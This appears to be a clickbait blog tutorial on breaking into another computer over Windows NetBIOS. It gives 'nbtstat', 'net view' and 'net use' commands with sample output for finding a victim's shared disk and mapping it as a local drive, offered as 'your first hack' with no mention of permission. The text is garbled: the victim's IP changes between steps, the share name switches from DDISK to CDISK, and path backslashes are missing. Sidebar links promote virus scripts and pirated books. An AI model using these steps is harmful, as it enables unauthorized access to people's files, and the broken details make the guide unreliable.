Hacks computer using command prompt
With this simple and easy to learn guide you will quickly learn to hack computers and make your first hack today. NetBIOS stands for Network Basic Input Output System.
hacks computer using NetBIOS commands
Suggested Reading :
Create 25 Most Dangerous Virus using Notepad (Full Script Available In this post)
Learn Hacking With these 20 FreeAndroid apps (These apps are not available at playstore)
Download Free 211+ Beginners Friendly Ethical Hacking Books ( You will also get ankit fadia paid books for free)
You can easily hack any computer with this method. We can get the following information by NetBIOS commands-
Name of the computer
sharing file/disk name
let’s start now.First, you need to open cmd commands and IP address of the victim which is not a difficult task.
The command that you will use to view the NetBIOS name is
c:windows>nbtstat -a 220.127.116.11
Let’s suppose that the output comes out to be
NetBIOS Remote Machine Name Table
Name Type Status ————————————————————————————————- user <00> UNIQUE Registered workgroup <00> GROUP Registered user <03> UNIQUE Registered
netbios commands usergroup
user <20> UNIQUE Registered
MAC Address = 00-02-44-14-23-E6
The number <20> shows that the victim has enabled the File And Printer Sharing. If you get <20> its means you may hack the victim’s system.
NOTE – If you do not get this number there are two possibilities
1. You do not get the number <20>. This shows that the victim has not enabled the File And Printer Sharing.
2. You get “Host Not found”. This shows that port 139 is closed or the IP address doesn’t exist.
Now our next step would be to view the drive or folders the victim is sharing.
We will use command
c:windows>net view \18.104.22.168
Let’s suppose we get the following output
Shared resources at \22.214.171.124 ComputerNameGoesHere
Share name Type Used as Comment
———————————————————————————————– DDISK Disk
The command was completed successfully.
“DISK” shows that the victim is sharing a Disk named DDISK.
Till now we know that there is a computer whose IP address happens to be 126.96.36.199 and on that computer File and printer sharing is enabled and the victim’s hard disk’s name is DDISK.
Now we will connect our computer to that hard disk. After we have connected successfully a drive will be created on our computer and by double-clicking on it we will be able to view the contents of the drive.
If we have connected our newly formed drive to the victim’s share name DDISK it means that we our drive will have the same contents as that of the DDISK.
1.Top 18 whatsApp tricks which you must know before ending 2022. (You can say thanks me later.)
2.Best 18 Facebook Tricks which no-one will tell you . ( You will not find these tricks over Internet)
3.Learn Free Ethical course with these 15 Best Hacking Websites to Learn Ethical Hacking From Basic .
We will use the NET command to do our work.
Let’s suppose we want to make a drive k: on our computer and connect it to the victim’s share we will issue the command
c:windows>net use k: \188.8.131.52CDISK
You may replace k letter with any other letter.
If the command is successful we will get the confirmation – The command was completed successfully.
The command was completed successfully
Now just double-click on the My Computer icon on your desktop and you will be a happy hacker!
We have just created a new drive k: Just double click on it and you will find that you are able to access the remote computer’s hard disk. Enjoy your first hack! [ .=’full’]
If you have any thoughts or problem performing this action, Please just comments. Share this with your best friends so that they will also be aware of these smart tricks.